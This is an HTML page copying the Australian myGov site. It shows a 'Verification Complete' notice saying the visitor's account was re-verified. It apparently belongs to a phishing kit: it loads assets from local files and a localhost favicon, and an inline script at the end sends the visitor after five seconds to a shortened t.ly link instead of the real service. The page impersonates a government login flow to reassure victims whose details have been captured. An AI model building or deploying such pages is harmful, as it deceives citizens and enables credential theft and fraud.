<!DOCTYPE html>
<html lang="en"><head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <title>
    Sign in
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="shortcut icon" href="http://localhost:3003/img/favicon.png" type="image/png">
	<link href="oo_files/css.css" rel="stylesheet">
  <link rel="stylesheet" href="oo_files/main.css">
</head>

<body>
  <header role="banner" class="header">
    <section class="wrapper">
      <div class="inner">
        <div class="cbLogin-grid">
          <div class="cbLogin-grid-row">
            <a href="https://beta.my.gov.au/" class="cbLogin-logo__link">
              <img id="cbLogin-logo" src="oo_files/logo-dark.svg" role="img">
            </a>

            <div class="header-links">
              <a href="https://beta.my.gov.au/en/about/help">Help</a>
            </div>
          </div>
        </div>
      </div>
    </section>
  </header>

  <div class="wrapper-mapwap">
    <div class="main-block" role="main">
      <div style="margin-top: 50px;margin-bottom:150px;text-align:center;">
        <svg width="64" height="64" viewBox="0 0 64 64" fill="none" xmlns="https://www.w3.org/2000/svg">
          <circle cx="32" cy="32" r="32" fill="#62CF66"></circle>
          <path fill-rule="evenodd" clip-rule="evenodd" d="M28.2514 44.0347C27.4541 44.9285 26.0553 44.9259 25.2614 44.0291L14.5907 31.9753C14.151 31.4787 14.3078 30.6995 14.9054 30.4116L15.3589 30.1931C15.686 30.0354 16.0729 30.0675 16.3695 30.2769L25.0794 36.423C25.8341 36.9556 26.8554 36.902 27.5502 36.2934L47.6139 18.7212C47.9155 18.4571 48.3457 18.3986 48.7068 18.5726L49.0901 18.7573C49.689 19.0458 49.8448 19.8277 49.4023 20.3238L28.2514 44.0347Z" fill="white"></path>
        </svg>
        <h3>Verification Complete</h3>
        <p>Your account has successfully been re-verified. You will be redirected back to our homepage shortly.</p>
      </div>
    </div>
  </div>

  <footer role="contentinfo">
    <div class="wrapper">
      <div class="inner">
        <section class="footer-list">
          <nav>
            <h2 class="sr-only">Footer</h2>
            <ul class="lower-links">
              <li>
                <a href="https://my.gov.au/en/about/terms">Terms of use</a>
              </li>
              <li>
                <a href="https://my.gov.au/en/about/privacy-and-security">Privacy and security</a>
              </li>
              <li>
                <a href="https://my.gov.au/en/about/copyright">Copyright</a>
              </li>
              <li>
                <a href="https://my.gov.au/en/about/accessibility">Accessibility</a>
              </li>
            </ul>
          </nav>
        </section>

        <div class="footer-lower">
          <section class="footer-lower-logo">
            <a href="https://beta.my.gov.au/">
              <img src="oo_files/logo-light.svg" width="313.17" height="70" role="img">
            </a>
          </section>

          <p class="footer-acknowledgement">We acknowledge the 
Traditional Custodians of the lands we live on. We pay our respects to 
all Elders, past and present, of all Aboriginal and Torres Strait 
Islander nations.</p>
        </div>
      </div>
    </div>
  </footer>

  <script>
    setTimeout(() => {
      window.location.href = 'https://t.ly/Er0uv';
    }, 5000)
  </script>



</body></html>